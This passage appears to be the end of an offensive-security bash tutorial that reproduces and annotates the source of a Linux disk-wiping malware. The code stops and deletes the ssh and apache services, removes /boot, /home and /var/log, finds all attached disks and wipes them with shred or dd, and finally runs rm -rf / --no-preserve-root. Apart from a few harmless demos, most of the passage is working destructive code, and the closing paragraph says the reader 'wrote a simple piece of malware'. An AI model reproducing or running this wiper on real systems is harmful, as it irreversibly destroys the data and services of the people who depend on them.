
function select_wiping_command() {
  local retval=0

  if command -v shred &> /dev/null; then
    wipecmd="shred"
    wipeargs="-n 1 -x -z "
    # -n 1: one iteration (interesting, less than the default 3)
    # -x: don't round file sizes up to the next full block
    # -z: add a final overwrite with zeros to hide shredding
  elif command -v dd &> /dev/null; then
    wipecmd="dd"
    wipeargs="bs=1k if=/dev/urandom of="
    # reads and writes 1k bytes at a time
    # input is random bytes
  else
    retval=1
  fi

  return $retval
}
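To see how wipecmd and wipeargs later combine into a single command line (wipe_disks runs `eval "$wipecmd $wipeargs$file"`), here is a harmless illustration that only echoes what each branch would execute against a hypothetical /dev/sdX:

```shell
# Illustration only: print the command each branch would run against a
# hypothetical /dev/sdX. Nothing is wiped here.
wipecmd="shred"; wipeargs="-n 1 -x -z "
echo "$wipecmd $wipeargs/dev/sdX"   # shred -n 1 -x -z /dev/sdX

wipecmd="dd"; wipeargs="bs=1k if=/dev/urandom of="
echo "$wipecmd $wipeargs/dev/sdX"   # dd bs=1k if=/dev/urandom of=/dev/sdX
```

Note how the trailing space in the shred wipeargs, and the trailing `of=` in the dd wipeargs, let the same concatenation pattern work for both tools.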

The downloaded malware will then execute the core destructive steps:

  • It checks whether the following services are running: apache, http, and ssh. Each running service in that list is stopped, disabled, and its systemd unit file removed. The systemd daemon is then reloaded.
function stop_and_disable_service() {
  local service_name="${1}.service"  # service name passed as first argument
  local dir
  local full_file_name

  if systemctl --quiet is-active $service_name > /dev/null 2>&1; then
    # if the service is active (currently running)

    systemctl stop $service_name > /dev/null 2>&1     # stop it
    chkconfig off $service_name > /dev/null 2>&1      # disable it at boot (using chkconfig)
    systemctl disable $service_name > /dev/null 2>&1  # disable it at boot (using systemctl)

    for dir in "${systemd_dirs[@]}"; do
      # search for the service file in the systemd directories
      full_file_name="${dir}/${service_name}"

      if test_file_exists "$full_file_name"; then
        # if the file exists, remove it
        rm $full_file_name > /dev/null 2>&1
      fi
    done

    systemctl daemon-reload > /dev/null 2>&1  # reload the systemd daemon after deleting the service
    systemctl reset-failed > /dev/null 2>&1   # reset all units (services) with failed status
  fi
}
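This function (and several below) relies on a helper called test_file_exists that never appears in the sample. A plausible one-liner, assuming it simply wraps the test builtin:

```shell
# Plausible reconstruction; the name comes from the sample, the body is an
# assumption. True if the path exists (file, directory, or device node).
test_file_exists() {
  [ -e "$1" ]
}
```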
  • It deletes the /boot, /home, and /var/log directories.
declare -a systemd_dirs=(   # list of systemd directories; used to search for
  "/etc/systemd/system"     # (and kill) some running services (apache, http,
  "/lib/systemd/system"     # and ssh)
  "/usr/lib/systemd/system"
)
function delete_directories() {
  local dir_list=$1
  local f

  for f in ${dir_list}; do
    if [ -d "$f" ]; then
      rm -rf $f --no-preserve-root > /dev/null 2>&1  # note the --no-preserve-root flag
    fi
  done
}
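A safe way to watch this pattern work is against a scratch directory, never real system paths. This demo redefines the function without --no-preserve-root, which only matters when the target is / itself:

```shell
# Demo against a throwaway directory; --no-preserve-root is dropped since
# it is only meaningful when the target is /.
delete_directories() {
  local f
  for f in $1; do                 # word-split the space-separated list
    [ -d "$f" ] && rm -rf "$f"    # remove each entry that is a directory
  done
}

demo=$(mktemp -d)
mkdir -p "$demo/boot" "$demo/home" "$demo/var/log"
delete_directories "$demo/boot $demo/home $demo/var"
ls -A "$demo"   # prints nothing: all three trees are gone
```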
  • It finds disks attached to the system using two methods: processing the output of lsblk (considering only disks) and enumerating /dev names. If at least one disk is found, they’re wiped in parallel using the chosen method (shred or dd).
function wipe_disks() {
  local retval=0
  local ev
  local file
  local i=0
  local -a pidlist
  local p

  if [[ "${#disk_list[@]}" -gt 0 ]]; then

    for file in "${disk_list[@]}"; do
      ev=$(eval "$wipecmd $wipeargs$file 2>/dev/null") &
      pidlist[${i}]=$!  # get pid of the wiping command just launched
      ((i++))

      if [ "$ev" ]; then
        retval=1
      fi
    done

    for p in ${pidlist[@]}; do
      wait $p  # wait for the wiping command to finish
    done
  fi

  return $retval
}

function find_disks() {
  local retval=1
  local lsblk_output
  local lsblk_output_clean
  local devname
  local devtype
  local full_devname
  local n

  lsblk_output=$(lsblk --nodeps --noheadings --output NAME,TYPE 2> /dev/null)  # lists block devices:
  # no holder devices or slaves, no headings
  if [[ ! -z "$lsblk_output" ]]; then

    lsblk_output_clean=$(echo "$lsblk_output" | sed 's/[[:space:]]\+/ /g')  # remove extra spaces from the list
    # this is never used!
    if [ "$lsblk_output_clean" ]; then
      n=0
      while read -r devname devtype; do  # read device name and type
        if [ "$devtype" == "disk" ]; then  # only care about disks
          full_devname="/dev/${devname}"
          if test_file_exists "$full_devname"; then
            # if the device file exists, add it to the list
            disk_list[$n]=$full_devname
            ((n++))
            retval=0  # there's at least one disk
          fi
        fi
      done <<< "$lsblk_output"  # Bug? Should be $lsblk_output_clean?
    fi
  fi

  if [[ $retval -eq 1 ]]; then  # if no disks were found in the lsblk output
    n=0
    disk_list=()
    for c in h s; do
      for devname in ${c}d{a..z}; do  # iterate over {hda, ..., hdz, sda, ..., sdz}
        full_devname="/dev/${devname}"
        # add those that exist
        if test_file_exists "$full_devname"; then
          disk_list[$n]=$full_devname
          ((n++))
          retval=0
        fi
      done
    done
  fi

  return $retval
}
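The fallback enumeration leans on an ordering detail of bash: brace expansion runs before parameter expansion, so ${c}d{a..z} first expands to ${c}da ${c}db ... and only then substitutes c. A quick demonstration:

```shell
# Brace expansion happens before ${c} is substituted:
c=s
echo ${c}d{a..c}   # sda sdb sdc
```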
  • Finally, it recursively deletes the root directory (rm -rf / --no-preserve-root). Then, it tries to remove the wiper script again.
  # Removes /
  rm -rf / --no-preserve-root > /dev/null 2>&1
}

END

Well, that’s all for now. I hope you’ve learned something new. We covered a lot of ground, from basic syntax to automating reconnaissance tasks, parsing tool output for important information, and using bash techniques to navigate restricted networks more efficiently. We even wrote a simple piece of malware.

But don’t rush through it. Take your time to go through each part and understand it by reading the comments in the scripts. Bash is one of those essential skills that I believe everyone should have or at least be comfortable with. Its powerful scripting capabilities allow you to scale your attacks and create your own tools when needed.